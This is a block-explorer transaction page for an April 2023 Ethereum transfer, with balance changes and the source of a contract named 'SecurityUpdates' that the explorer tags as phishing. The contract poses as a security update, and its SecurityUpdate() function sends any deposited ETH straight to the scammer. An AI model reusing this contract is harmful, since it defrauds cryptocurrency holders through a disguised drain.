ETH Price: $2,610.59 (-3.11%)

Transaction Decoder

Block:
17017039 at Apr-10-2023 09:53:59 AM +UTC
Transaction Fee:
0.001293715043518012 ETH $3.38
Gas Used:
32,723 Gas / 39.535343444 Gwei

Account State Difference:

  Address   Before After State Difference Code
0x1661F1B2...E5Eb23Ee3
(Fake_Phishing66321)
0.00012081565922397 Eth0.054337614571662472 Eth0.054216798912438502
(Lido: Execution Layer Rewards Vault)
108.597297116396841099 Eth108.597870923085448416 Eth0.000573806688607317
0xE7c9f04B...92a2C78AB
0.069216798912438502 Eth
Nonce: 3
0.013706284956481988 Eth
Nonce: 4
0.055510513955956514

Execution Trace

ETH 0.054216798912438502 SecurityUpdates.CALL( )
  • ETH 0.054216798912438502 Fake_Phishing66321.CALL( )
    pragma solidity ^0.8.7;
    
    contract SecurityUpdates {
        address private owner;
        constructor() {
            owner = msg.sender;
        }
        function withdraw() public payable {
            require(msg.sender == owner, "Bro? Are you a stupid idiot?");
            payable(msg.sender).transfer(address(this).balance);
        }
        function SecurityUpdate() public payable {
            if (msg.value > 0) payable(owner).transfer(address(this).balance);
        }
    }